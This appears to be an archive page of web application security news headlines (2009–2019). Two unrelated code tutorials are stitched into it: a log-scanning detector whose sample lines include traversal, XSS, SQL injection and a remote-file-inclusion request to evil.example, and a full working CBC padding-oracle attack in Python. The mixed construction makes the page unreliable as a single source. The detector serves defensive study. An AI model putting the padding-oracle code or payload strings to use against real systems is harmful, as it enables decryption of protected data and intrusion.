Web application and API security best practices
- October 09, 2019
Twitter used two-factor authentication information, including email addresses and phone numbers, to target ads for an unknown number of people over an unknown period of time.
- April 30, 2019
Since the start of 2018, Facebook has had a seemingly constant cascade of security issues and privacy scandals. Here's a look back at the social media giant's most serious issues.
- November 16, 2018
The promised integration with Have I Been Pwned is expanding in Firefox Monitor with new breach alerts when a user visits a recently compromised website.
- July 24, 2018
Successful phishing attempts have been eliminated among Google employees following a requirement to use physical security keys in order to gain access to all Google accounts.
- June 29, 2018
With new Have I Been Pwned integration, Firefox and 1Password users will be able to learn if their email addresses have been compromised in any known data breaches.
- May 04, 2018
On none other than World Password Day, a Twitter bug was announced that led to the passwords of all 336 million users being stored in plaintext in an internal log.
- April 03, 2018
Cloudflare promises its new 1.1.1.1 DNS service is faster and enables better privacy for web browsing than competing offerings, but it's unclear how different its service will be.
- January 25, 2018
The Electron framework -- used to develop desktop apps using web code -- included a remote code execution flaw that was passed on to popular apps like Slack.
- December 07, 2017
The latest version of the OWASP Top Ten web application risks is much like previous versions, and that's not a bad thing at all.
- March 17, 2017
Although minting forged authentication cookies is not a widely understood technique, the Yahoo hacker indictments have brought it to the forefront and shown how dangerous it can be.
- March 03, 2017
News roundup: A researcher discovers a Slack hack through stolen tokens. Plus, another WordPress flaw puts 1 million users at risk; Necurs botnet does DDoS now; and more.
- January 17, 2017
Researchers saw a Gmail phishing campaign in the wild using clever tricks to access accounts including a difficult 2FA bypass only possible in real time.
- January 13, 2017
New Microsoft privacy tools will give users control over the data collected on the web and within Windows. Experts hope the tools will offer data privacy transparency.
- December 14, 2016
A new Certificate Transparency Monitoring tool from Facebook may help webmasters track and vet TLS certificates, as well as improve integrity and security for HTTPS traffic.
- July 27, 2016
Problems with LastPass security might have been improperly disclosed, putting user passwords at higher risk, but the flaws have already been fixed, with an update rolling out now.
- May 19, 2016
The ImageTragick bug raises questions over responsible disclosure, as the flaw in the ImageMagick image-processing library exposes millions of websites to remote code execution.
- April 12, 2016
Customers with hosted sites will now have WordPress SSL turned on for free by default, thanks to Let's Encrypt certificates, potentially making a large number of websites more secure.
- April 05, 2016
Security researchers have updated the BREACH attack so that a Facebook Messenger or Gmail breach could be performed much faster, but the overall risk remains limited.
- January 07, 2016
Researchers have found a new way to exploit an MD5 vulnerability to put users at risk, and experts say this is all the more reason to move faster in transitioning to SHA-256.
- December 11, 2015
News roundup: Cyber politics in U.S., as leaders attempt to balance access to strong encryption with terror threats. Also: Microsoft's German data centers, SHA-1 deprecation schedule, and more.
- December 04, 2015
Adobe moves could signal the end of the ever-vulnerable Flash Player, and experts say more support for HTML5 could lead to the Adobe Flash end of life.
- November 13, 2015
News roundup: WebSphere, JBoss, Jenkins and more hit by Java vulnerability in an open source library. Plus, SAP HANA deals with critical vulnerabilities, and more.
- September 18, 2015
News roundup: Additional research shows a Cisco router implant affects more devices than originally reported. Plus: Let's Encrypt's first cert issued; Tor in the library; the mitigated (but not fixed) iOS AirDrop vulnerability.
- August 27, 2015
Malvertising campaigns are becoming more effective due to the popularity of the Angler EK and its use of Flash zero-day vulnerabilities. And one expert says ad blockers are not the answer.
- August 27, 2015
An up-to-date application security program -- as well as knowing how to connect with stakeholders -- is critical to being a successful CISO today, said Renee Guttmann, vice president, Office of the CISO at Accuvant Inc.
- August 14, 2015
Dropbox announced it is strengthening login options with support for universal 2nd factor (U2F) security keys with the aim of making two-step verification faster and easier.
- July 31, 2015
News roundup: New threats add to the Tor anonymity debate, as a new browser aims to take anonymous browsing to the next level. Plus: Android security outlook is bad -- or is it? Also, another Xen host escape flaw and Wassenaar revisions put on hold.
- July 17, 2015
News roundup: Are the tides turning on mobile app safety? One white hat hacker's attempt to reverse-engineer the Subway app offers surprising results. Plus: CloudFlare Transparency Report; another call to eliminate RC4; Black Hat attendee survey.
- June 19, 2015
News roundup: Details have emerged about weaknesses in OS X and iOS that allow attackers to upload malware and steal passwords and data. Plus: More jump on HTTPS bandwagon; CSO/CDO salaries increase; 23% of software app components contain flaws.
- June 12, 2015
News roundup: The call for ubiquitous HTTPS has grown stronger as of late; the White House and Apple are hoping to help push the movement. Plus: The cost of cybersecurity management to rise 38%; a 165% ransomware increase; gender salary gap closes?
- June 05, 2015
News roundup: New settings and options to boost user privacy and security are emerging on major websites, but is it enough?
- May 20, 2015
Google's new Chrome extension policy mandates that all users and developers must install web browser extensions from the Chrome Web Store.
- May 15, 2015
News roundup: Microsoft released security details of its new Edge browser, but is it enough to restore user confidence? Plus: Millennial security threats; new ransomware, GPU-based malware; black hat cybersecurity services.
- May 08, 2015
WordPress was found to have two new zero-day XSS vulnerabilities that were being exploited, but a patch has already been issued to mitigate the issues.
- April 27, 2015
A researcher has released a proof-of-concept exploit for a WordPress vulnerability leveraging stored XSS, which could lead to remote code execution on affected servers.
- April 23, 2015
At RSA Conference 2015, John Pescatore offered real-world case studies proving that information security technologies can help prevent data breaches.
- January 30, 2015
News roundup: YouTube announced it has stopped using Flash by default in favor of HTML5. Is this the long-awaited end for Flash? Plus: Java was the riskiest software in 2014; BEC scams cost $215 million last year; NFL data interceptions.
- January 16, 2015
News roundup: Recently discovered firmware flaws highlight the challenges posed by hardware security. Plus: Heartland's breach warranty; RSA's overhaul; and Download.com's app (in)security.
- July 18, 2014
With another round of patches for several serious Java flaws, Oracle's quarterly CPU showed that Java security problems are not receding.
- July 01, 2014
A new online archive is allowing researchers to anonymously submit and expose cross-site scripting vulnerabilities uncovered across the Web.
- June 26, 2014
Special report: The handling of an OWASP employee's disputed harassment claim has sparked a debate over the group's governance and its future.
- June 17, 2014
With mobile, cloud and the Internet of Things driving massive API growth, experts say now is the time for API gateway technology to shine.
- April 22, 2014
The 2014 Verizon data breach report shows a big rise in Web application attacks, with CMS frameworks and user credentials the most likely targets.
- April 17, 2014
When it comes to app risk management, who is ultimately responsible: business leaders or security professionals? A new report weighs in.
- March 21, 2014
Researchers have warned of numerous HealthCare.gov security issues. Michael Cobb reviews the website security lessons learned for enterprises.
- January 27, 2014
A researcher says Oracle hasn't properly addressed long-standing Oracle Forms and Reports flaws, which could be exploited to gain remote access.
- January 21, 2014
The first Oracle Critical Patch Update of 2014 included fixes for 36 Java vulnerabilities, but only 5 Oracle Database vulnerabilities. Why so few?
- February 08, 2013
Professor Kenneth Paterson and graduate student Nadhem AlFardan have discovered a TLS attack that tracks the timing of error messages to reveal plaintext.
- December 12, 2012
A cybercriminal gang associated with the Butterfly Botnet is believed to have netted more than $850 million by stealing credit card and bank account data.
- December 11, 2012
A website flaw was exposed by hackers who registered as employers and posted a fake job advertisement.
- September 19, 2012
Vulnerabilities in HTML 5 make it an emerging threat; however, SQL injection and XSS remain among the top attacks.
- August 29, 2012
Basic Java sandboxing has been around since 1995, but flaws in the Java virtual machine are highly targeted. Experts are calling on Oracle to do more.
- August 28, 2012
The Java zero-day flaw affects users of Firefox, Internet Explorer and Safari.
- August 15, 2012
Security researchers have detected attacks targeting users of Internet Explorer with a Flash file embedded in a Microsoft Word document.
- July 31, 2012
Researchers from IBM's X-Force Advanced Research Team demonstrated how an attacker could escape a Flash sandbox implementation at Black Hat.
- July 17, 2012
Attack toolkits have grown in sophistication as cybercriminals add better code obfuscation and other techniques to avoid detection and improve attack effectiveness.
- July 16, 2012
Google Chrome's Native Client was designed to run native code safely inside the browser, but researcher Chris Rohlf says Google Chrome sandbox security flaws exist.
- June 06, 2012
Google will display a warning banner when account activity appears to be state-sponsored; the feature is backed by its security operations team.
- April 18, 2012
A review of hundreds of unique custom Web applications found more than half are vulnerable to cross-site scripting and more than 86% contain injection flaws.
- February 06, 2012
Adobe has launched the public beta of a new Flash Player sandbox feature for Firefox users, making attacks more difficult for cybercriminals.
- January 30, 2012
Security firm M86 Security has discovered hundreds of WordPress websites compromised by Phoenix.
- January 27, 2012
Column: Third-party applications are notoriously hard to patch and often easy to exploit. Is it time to ban applications, or can they be secured with a new approach?
- January 26, 2012
Column: Third-party applications are hard to patch and easy to exploit. Is it time to ban some apps, or to take a new approach?
- January 24, 2012
Web-based antimalware vendor Dasient is the second security firm acquired by Twitter in recent months; in November, Twitter acquired Android security vendor Whisper Systems.
- November 28, 2011
Twitter acquired Whisper Systems, a firm that makes mobile encryption and firewall technology for Android devices.
- October 26, 2011
- October 25, 2011
Researchers in Germany have demonstrated weaknesses in the W3C XML encryption standard used to secure websites and other Web applications.
- September 13, 2011
Cybercriminals are using an old technique to lure victims into giving up personal information and potentially infecting their systems with malware.
- September 06, 2011
New features in Java 7 aim to bolster security by switching off weaker encryption schemes.
- August 04, 2011
Black Hat 2011: A free Microsoft .NET application security tool helps programmers reverse-engineer .NET applications to manipulate and control them.
- August 04, 2011
For most security teams, it’s still a struggle to find money for secure application development, according to a panel of Black Hat 2011 experts.
- July 26, 2011
Automated attack tools are targeting directory traversal bugs, cross-site scripting errors, SQL injection flaws and remote file inclusion vulnerabilities.
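The four vulnerability classes named above leave recognisable traces in ordinary web server access logs, provided the request target is URL-decoded (repeatedly, since tools double-encode to slip past single-pass filters) before pattern matching. The following added example, not code from the original page, runs that triage over a handful of constructed Apache combined-format lines; the log lines, IP addresses and the pattern set are assumptions made here, and the patterns are a starting point rather than a complete ruleset.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines, not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Jul/2011:10:01:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [26/Jul/2011:10:01:03 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3020 "-" "curl/7.21"
10.0.0.7 - - [26/Jul/2011:10:01:04 +0000] "GET /products?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0 "-" "sqlmap/1.0"
10.0.0.8 - - [26/Jul/2011:10:01:05 +0000] "GET /index.php?page=http://evil.example/shell.txt%3F HTTP/1.1" 200 44 "-" "libwww-perl/5.8"
10.0.0.9 - - [26/Jul/2011:10:01:06 +0000] "GET /index.php?page=%252e%252e%252fetc/passwd HTTP/1.1" 404 0 "-" "Mozilla/5.0"
10.0.0.10 - - [26/Jul/2011:10:01:07 +0000] "GET /about.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# client, identd, user, [timestamp], "METHOD target protocol", status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)

# One rule per attack class named in the item above; all applied to the decoded target.
RULES = {
    "directory_traversal": re.compile(r"\.\.[/\\]|/etc/passwd|[a-z]:\\windows", re.I),
    "xss": re.compile(r"<script|javascript:|on(?:error|load|mouseover)\s*=", re.I),
    "sql_injection": re.compile(
        r"'\s*(?:or|and)\s+'?\d|union\s+select|sleep\s*\(|--\s|;\s*drop\s", re.I),
    "remote_file_inclusion": re.compile(r"=\s*(?:https?|ftp)://", re.I),
}


def fully_decode(target: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so that
    %252e%252e%252f is seen as ../ and not missed as harmless text."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_log(text: str) -> list:
    """Return one finding per (line, rule) hit, in log order then rule order."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # malformed line: skip rather than guess at its fields
        decoded = fully_decode(m["target"])
        for category, rule in RULES.items():
            if rule.search(decoded):
                findings.append({
                    "ip": m["ip"],
                    "category": category,
                    "status": int(m["status"]),
                    "decoded_target": decoded,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:<10} {f['category']:<22} {f['status']} {f['decoded_target']}")
```

Two things the decoded view adds over grepping the raw log: the double-encoded traversal on the fifth line is only visible after the second decode round, and a 404 or 500 beside a hit tells the analyst whether the probe reached application code, which is what separates scanner noise from an attempt worth chasing.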
- June 14, 2011
Citigroup hackers used a common website vulnerability to bypass security controls and reap confidential banking data.
- February 08, 2011
A survey of more than 600 IT security professionals finds nearly three quarters have been hacked at least once in the last 24 months through insecure Web applications.
- January 27, 2011
The TippingPoint Zero-Day Initiative (ZDI) program saw 300 vulnerabilities patched in 2010, triple the number repaired in 2009.
- January 24, 2011
The Do Not Track proposal, which sends a special HTTP header to websites, may be supported in future versions of Firefox, but for it to fully work, websites must also honor the header.
- January 18, 2011
Adobe Systems, Google, Microsoft and others are deploying applications that use sandboxing technology to defend against potential attacks, but savvy hackers know how to bypass it.
- January 14, 2011
Engineers at Adobe Systems Inc. are working on a redesign of the Flash Player Settings Manager to incorporate features requested by users and privacy advocates.
- January 06, 2011
Adobe is responding to a new method that breaks a security feature meant to prevent Flash files from passing data to remote systems; the issue is classified as a "moderate" security threat.
- September 28, 2010
Attackers are targeting a weakness in the ASP.NET Web application framework. A fix is expected today at 1 p.m. ET.
- September 21, 2010
A cross-site scripting Twitter attack could have been exploited to spread dangerous malware and steal user data, experts said.
- September 21, 2010
Microsoft issued an update to its security advisory after discovering limited, active attacks against .NET Web applications with flawed encryption implementations.
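The flaw behind the two September 2010 ASP.NET items was a CBC padding oracle (MS10-070): the framework's error handling let a client tell whether a decrypted ciphertext had valid padding, which is enough to decrypt it without the key. The February 2013 Lucky 13 item higher up the list is the timing variant of the same class against TLS's MAC-then-encrypt records. The following added example, not code from the original page, from Microsoft or from the Lucky 13 researchers, implements the oracle and the attack against a toy CBC construction. The block cipher is a four-round Feistel network built from HMAC-SHA256, an assumption made here so the code needs no third-party library (the attack does not depend on the cipher); the key, the message and the boolean oracle standing in for the distinguishable error page or timing difference are likewise constructed.

```python
import hashlib
import hmac
import os

BLOCK = 16  # bytes


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Four-round Feistel network over 8-byte halves: a stand-in for AES."""
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right


def pad(data: bytes) -> bytes:  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    iv = os.urandom(BLOCK)
    out, prev = [iv], iv
    padded = pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)  # IV || C1 || C2 ...


def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    if len(data) % BLOCK or len(data) < 2 * BLOCK:
        raise ValueError("bad length")
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    plain = b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))
    return unpad(plain)


SERVER_KEY = os.urandom(32)  # constructed; the attacker never sees it


def padding_oracle(data: bytes) -> bool:
    """The leak: only whether padding was valid. In MS10-070 that was a
    distinguishable error response; in Lucky 13 a timing difference."""
    try:
        cbc_decrypt(SERVER_KEY, data)
        return True
    except ValueError:
        return False


def recover_block(oracle, prev: bytes, block: bytes) -> bytes:
    """Recover D(block) one byte at a time from the end by forging the
    preceding block, then XOR with the real preceding block for plaintext."""
    inter = bytearray(BLOCK)
    for padv in range(1, BLOCK + 1):
        j = BLOCK - padv
        forged = bytearray(BLOCK)
        for k in range(j + 1, BLOCK):
            forged[k] = inter[k] ^ padv  # already-known bytes decrypt to padv
        for guess in range(256):
            forged[j] = guess
            if not oracle(bytes(forged) + block):
                continue
            if padv == 1:
                # ..02 02 (or longer) would also pass; a true ..01 survives a
                # change to the second-to-last byte, an accidental one does not.
                probe = bytearray(forged)
                probe[j - 1] ^= 0xFF
                if not oracle(bytes(probe) + block):
                    continue
            inter[j] = guess ^ padv
            break
        else:
            raise RuntimeError(f"oracle accepted no value for byte {j}")
    return _xor(bytes(inter), prev)


def padding_oracle_attack(oracle, data: bytes) -> bytes:
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    plain = b"".join(recover_block(oracle, p, c) for p, c in zip(blocks, blocks[1:]))
    return unpad(plain)


if __name__ == "__main__":
    ciphertext = cbc_encrypt(SERVER_KEY, b"user=alice;role=admin")  # constructed message
    print(padding_oracle_attack(padding_oracle, ciphertext))
```

The attack needs at most 256 oracle queries per byte and never touches the key, which is why the fix for this class is to authenticate the ciphertext (an HMAC over IV and ciphertext checked before decryption, or an AEAD mode) and to return one indistinguishable error, in constant time, for every decryption failure. Keep in mind that the pad-value-1 probe in recover_block is the edge case most toy implementations get wrong: without it, a plaintext byte of 0x02 before the last position yields a false positive and every later byte comes out wrong.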
- June 25, 2010
The CISO for the city of Portland, Ore., advises that every enterprise be aware of one must-have secure Web gateway feature before buying.
- June 22, 2010
Trustwave said it would integrate Breach's Web application firewall into its pen-testing and code-review services. The vendor says it's committed to ModSecurity.
- June 22, 2010
A research firm argues social networking isn't the responsibility of enterprise information security, but social media governance policies and monitoring practices are important.
- April 22, 2010
Adding the "human element" to scanners could help pen testers evaluate a larger portion of an application's attack surface, according to two researchers at SOURCE Boston 2010.
- March 12, 2010
Jeremiah Grossman told RSA Conference 2010 attendees that a successful defense against Web-based flaws requires both a secure browser and a secure website infrastructure.
- February 08, 2010
With sales and marketing teams using social networks to connect with clients and potential customers, CISOs need to meet business needs while addressing risks.
- January 12, 2010
A variety of new tools and methods can help social networks monitor third-party applications for traffic anomalies and user content coding that could signal trouble.
- January 11, 2010
Social networks are opening their wallets in a big way to bolster security teams and install new security technologies to combat attacks.
- December 16, 2009
Alongside web browsers, Adobe Systems' PDF software and its Flash and Shockwave players made the annual list.
- December 08, 2009
The Cisco Annual Security Report highlights the best and worst in the cybercriminal investment portfolio for 2010.
- November 17, 2009
New InZero gateway uses hardware to halt malware by separating the endpoint from the network and isolating desktop software.
- November 10, 2009
Cybercriminals turn to cloud computing to feed commands to the throngs of zombie computers under their control and avoid detection.
- October 29, 2009
Kaspersky Krab Krawler analysis finds users fueling the number of malicious links on Twitter by posting URLs to infected websites.
- October 27, 2009
Cisco said its acquisition of ScanSafe would complement its line of IronPort appliances by offering customers Web security gateway services in the cloud.
- October 22, 2009
Web application firewall deployments have been mostly driven by the Payment Card Industry Data Security Standards, but one firm has discovered alternative benefits.
- October 13, 2009
Barracuda's acquisition of Purewire broadens its delivery model for URL filtering and securing Web applications through software as a service (SaaS) and hybrid approaches.
- September 16, 2009
Security experts point to online advertising campaigns that distributed faulty code to affiliates as the source of spikes in SQL injection attacks.
- September 15, 2009
A new report from the SANS Institute says flaws in client-side applications are often the most ignored by IT professionals.